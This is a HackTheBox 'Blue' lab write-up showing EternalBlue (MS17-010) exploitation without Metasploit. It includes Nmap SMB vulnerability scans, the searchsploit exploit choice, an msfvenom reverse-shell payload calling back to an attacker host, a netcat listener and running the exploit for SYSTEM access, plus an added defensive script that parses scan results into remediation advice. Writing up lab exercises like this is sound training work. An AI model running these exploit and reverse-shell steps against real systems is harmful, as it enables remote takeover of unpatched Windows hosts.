Blue is the third HackTheBox machine I have completed, but the first without using Metasploit. This machine exploits SMB through the well-known MS17-010 vulnerability, EternalBlue.
Summary
- Port scan using Nmap
- Searchsploit for non-Metasploit MS17-010 exploits
- msfvenom to create a non-Meterpreter reverse shell
- netcat listener
Machine IP: 10.10.10.40
Recon and Information Gathering
Port Scan with Nmap
As always, we first begin with a simple nmap port scan to discover any open ports on this machine.
nmap -n -sV -p- -T 5 -Pn 10.10.10.40
PORT      STATE    SERVICE      VERSION
135/tcp   open     msrpc        Microsoft Windows RPC
139/tcp   open     netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open     microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
49152/tcp open     msrpc        Microsoft Windows RPC
49153/tcp open     msrpc        Microsoft Windows RPC
49154/tcp open     msrpc        Microsoft Windows RPC
49155/tcp open     msrpc        Microsoft Windows RPC
49156/tcp open     msrpc        Microsoft Windows RPC
49157/tcp open     msrpc        Microsoft Windows RPC
52097/tcp filtered unknown
We can see that ports 135, 139 and 445 are open, as well as six high ports for MSRPC.
SMB
As we have SMB on port 445, let's enumerate it further.
nmap -n -A -p 445 -T 5 -Pn 10.10.10.40
PORT    STATE SERVICE      VERSION
445/tcp open  microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
Service Info: Host: HARIS-PC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: -13m39s, deviation: 34m35s, median: 6m17s
| smb-os-discovery:
|   OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
|   OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
|   Computer name: haris-PC
|   NetBIOS computer name: HARIS-PC\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2020-09-14T21:54:17+01:00
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2020-09-14T20:54:16
|_  start_date: 2020-09-14T20:16:58
Knowing this could be exploitable, let's run Nmap's SMB vulnerability scripts against port 445. (The script selector needs to match the smb-vuln-* script names, so it is quoted to stop the shell expanding it.)
nmap --script "smb-vuln*" -p 445 10.10.10.40
Host script results:
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: NT_STATUS_OBJECT_NAME_NOT_FOUND
| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|       servers (ms17-010).
This machine is vulnerable to EternalBlue, which means remote code execution!
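As an added defender-side example that is not part of the original write-up: a small Python script that parses the Nmap SMB host-script output above (pasted in as sample input) and turns it into a prioritised list of findings with remediation. The severity ordering and remediation wording are my own, not Nmap's.

```python
import re

# Sample input: the Nmap host-script output from the scans above, pasted in verbatim.
NMAP_OUTPUT = """\
| smb-security-mode:
|   account_used: guest
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb-vuln-ms17-010:
|   VULNERABLE:
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
"""

def parse_smb_scan(text):
    """Pull the hardening-relevant facts out of Nmap's SMB host-script output."""
    facts = {"account_used": None, "smb1_signing": None,
             "smb2_signing_required": None, "ms17_010_state": None, "cve": None}
    section = None
    for raw in text.splitlines():
        header = re.match(r"^\|_? ([\w-]+):$", raw)  # top-level script name lines only
        if header:
            section = header.group(1)
            continue
        line = raw.lstrip("|_ ").strip()
        key, _, value = (s.strip() for s in line.partition(":"))
        if section == "smb-security-mode" and key == "account_used":
            facts["account_used"] = value
        elif section == "smb-security-mode" and key == "message_signing":
            facts["smb1_signing"] = value.split()[0]  # drop Nmap's "(dangerous ...)" note
        elif section == "smb2-security-mode" and line.startswith("Message signing"):
            facts["smb2_signing_required"] = "not required" not in line
        elif section == "smb-vuln-ms17-010" and key in ("State", "IDs"):
            facts["ms17_010_state" if key == "State" else "cve"] = value
    return facts

def findings(facts):
    """Map parsed facts to (severity, finding, remediation) triples, worst first."""
    out = []
    if facts["ms17_010_state"] == "VULNERABLE":
        out.append(("critical", f"SMBv1 RCE MS17-010 ({facts['cve']})", "install the MS17-010 update and disable SMBv1"))
    if facts["smb1_signing"] == "disabled":
        out.append(("high", "SMB1 message signing disabled", "require SMB signing on the server"))
    if facts["smb2_signing_required"] is False:
        out.append(("medium", "SMB2 signing enabled but not required", "set SMB2 signing to required"))
    if facts["account_used"] == "guest":
        out.append(("medium", "guest account accepted for SMB sessions", "disable the Guest account"))
    return out
```

Run against a patched host whose output shows `message_signing: required` and no smb-vuln-ms17-010 section, `findings()` returns an empty list.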
Exploiting without Metasploit
Let's use searchsploit to find a non-Metasploit exploit in the database.
searchsploit --id MS17-010
kali@kali:~$ searchsploit --id ms17-010
------------------------------------------------------------------------------------------------------- ---------
 Exploit Title                                                                                         |  EDB-ID
------------------------------------------------------------------------------------------------------- ---------
Microsoft Windows - 'EternalRomance'/'EternalSynergy'/'EternalChampion' SMB Remote Code Execution (Metasploit) (M | 43970
Microsoft Windows - SMB Remote Code Execution Scanner (MS17-010) (Metasploit)                          | 41891
Microsoft Windows 7/2008 R2 - 'EternalBlue' SMB Remote Code Execution (MS17-010)                       | 42031
Microsoft Windows 7/8.1/2008 R2/2012 R2/2016 R2 - 'EternalBlue' SMB Remote Code Execution (MS17-010)   | 42315
Microsoft Windows 8/8.1/2012 R2 (x64) - 'EternalBlue' SMB Remote Code Execution (MS17-010)             | 42030
Microsoft Windows Server 2008 R2 (x64) - 'SrvOs2FeaToNt' SMB Remote Code Execution (MS17-010)          | 41987
------------------------------------------------------------------------------------------------------- ---------
Shellcodes: No Results
The machine is running Windows 7, so let's go ahead and use #42315, copying it into our working directory with:
searchsploit -m 42315
and then examining the source code.
The source code requires three things:
- Download mysmb.py
- Using MSFVenom to generate a reverse shell payload. This is indicated by:
"Note: there are many methods to get shell over SMB admin session. a simple method to get shell (but easily to be detected by AV) is executing binary generated by "msfvenom -f exe-service ...""
- If possible, provide login credentials and point to the msfvenom payload.
Preparing
The first thing to do is download the file from the exploit-db GitHub repository and then rename it:
wget https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42315.py
mv 42315.py.1 mysmb.py
Next, create the msfvenom reverse shell executable payload.
msfvenom -p windows/shell_reverse_tcp -f exe LHOST=10.10.14.27 LPORT=4444 > eternal-blue.exe
Next, as seen in our Nmap scan earlier, SMB accepts the 'guest' account, so enter the guest credentials into the exploit.
We'll also set the executable's location in the exploit file so that it is sent to the target and executed.
Lastly, set up a netcat listener on the attacking machine.
nc -nvlp 4444
Exploiting
Run the Python script:
python 42315.py 10.10.10.40
and check the netcat listener.
We have a shell with SYSTEM access!
User
Root
End Notes
I did have some issues when exploiting this machine, but this was due to my own silly errors, such as missing out a ' in service_exec() and putting the file location as /root/.
This is the first machine I have completed without using Metasploit, due to the OSCP not allowing it; likewise msfvenom was used due to Meterpreter not being allowed either.